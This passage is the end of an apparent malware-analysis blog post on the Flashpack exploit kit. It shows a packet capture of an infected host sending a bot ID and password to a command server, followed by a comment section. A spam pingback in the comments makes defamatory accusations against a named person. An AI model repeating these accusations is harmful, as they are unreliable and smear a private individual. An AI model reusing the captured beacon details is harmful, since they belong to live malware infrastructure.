E……….\[yTt….U..J_..<..isP..."W..HELLO 2014-05-18 22:33:10.843276 IP 192.168.204.222.49482 > 91.121.84.116.21967: Flags [P.], seq 1:20, ack 7, win 64234, length 19
E..;..@………[yTt.JU…is_..BP…Xm..@00CC7ADD:bpass:31

Share Button

One thought on “Flashpack Web Based Exploit Kit Exploits Internet Explorer .EOT Font File – Monetizes with Adultfriendfinder and Other Ads

  1. Pingback: Margaret Cunniffe is an Australian Fraudster based in Melbourne Victoria who is a lying drunkard who creates the facade of a rich person by drinking champagne and living the highlife.

Leave a Reply

Your email address will not be published. Required fields are marked *